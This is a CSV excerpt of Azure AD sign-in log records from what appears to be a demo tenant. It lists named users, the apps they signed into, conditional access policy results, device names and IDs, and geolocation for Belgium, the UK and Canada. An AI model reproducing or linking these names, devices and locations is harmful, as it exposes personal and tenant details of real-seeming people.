'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",dcc7c5bf-deb1-42c1-bd06-03c5fdc81400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dcc7c5bf-deb1-42c1-bd06-03c5fdc81400,SigninLogs,Sucess,50.6406517,5.572050095
+819,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,56a05d1d-b683-4c71-b753-4b1af89933fa,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:03,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",ad09f59c-2ec1-4ebf-90ab-0f25d47a0f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ad09f59c-2ec1-4ebf-90ab-0f25d47a0f00,SigninLogs,Sucess,50.6406517,5.572050095
+820,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:42.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,62585628-4f7f-4af6-989e-6209bf780bd1,Microsoft.aadiam,Microsoft.aadiam,,bdb72692-2275-412b-8af0-ea21c2ebd174,4,BE,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,[],notApplied,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",46ab66bf-13d5-46c8-a514-03b73e8d0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",bdb72692-2275-412b-8af0-ea21c2ebd174,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,46ab66bf-13d5-46c8-a514-03b73e8d0e00,SigninLogs,Failed,50.6406517,5.572050095
+821,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:46.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,62585628-4f7f-4af6-989e-6209bf780bd1,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ace1d4a5-fd0b-463d-bfa6-011c02351000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ace1d4a5-fd0b-463d-bfa6-011c02351000,SigninLogs,Sucess,50.6406517,5.572050095
+822,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",b06f2f2f-9329-4168-a2cd-5754bb1d0800,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b06f2f2f-9329-4168-a2cd-5754bb1d0800,SigninLogs,Sucess,51.4458313,-0.969720006
+823,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:15.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9f05e4d8-0094-44de-bae0-73e805df8228,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",24234731-7e74-417b-b5a0-a50f14c30d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,24234731-7e74-417b-b5a0-a50f14c30d00,SigninLogs,Sucess,50.6406517,5.572050095
+824,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a4991e9e-9e06-4659-9d9c-eed91f14457b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",24234731-7e74-417b-b5a0-a50f5fc40d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,24234731-7e74-417b-b5a0-a50f5fc40d00,SigninLogs,Sucess,50.6406517,5.572050095
+825,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:50.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d574a08a-d5d2-424c-8e52-def493514b1e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",24234731-7e74-417b-b5a0-a50f23c50d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,24234731-7e74-417b-b5a0-a50f23c50d00,SigninLogs,Sucess,50.6406517,5.572050095
+826,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:42.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,62585628-4f7f-4af6-989e-6209bf780bd1,Microsoft.aadiam,Microsoft.aadiam,,bdb72692-2275-412b-8af0-ea21c2ebd174,4,BE,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,[],notApplied,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",46ab66bf-13d5-46c8-a514-03b73e8d0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",bdb72692-2275-412b-8af0-ea21c2ebd174,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,46ab66bf-13d5-46c8-a514-03b73e8d0e00,SigninLogs,Failed,50.6406517,5.572050095
+827,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d289af76-d369-458b-90a9-52e6127622f3,Microsoft.aadiam,Microsoft.aadiam,,Sridhar Periyasamy,4,CA,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:59,"{'operatingSystem': 'Windows 10', 'deviceId': '92720cc2-dd49-4250-a03f-8aa941f16177', 'browser': 'Edge 18.1836', 'displayName': 'SRIDHAR-SBOOK', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",fa160daf-6abe-49f2-9541-40bcbc700300,,,"{'countryOrRegion': 'CA', 'geoCoordinates': {'longitude': -119.27671813964844, 'latitude': 50.238258361816406}, 'state': 'British Columbia', 'city': 'Vernon'}",none,none,none,none,[],{'errorCode': 0},Sridhar Periyasamy,0dd4a385-2ff9-4fcb-9798-f748c832b74a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fa160daf-6abe-49f2-9541-40bcbc700300,SigninLogs,Sucess,50.23825836,-119.2767181
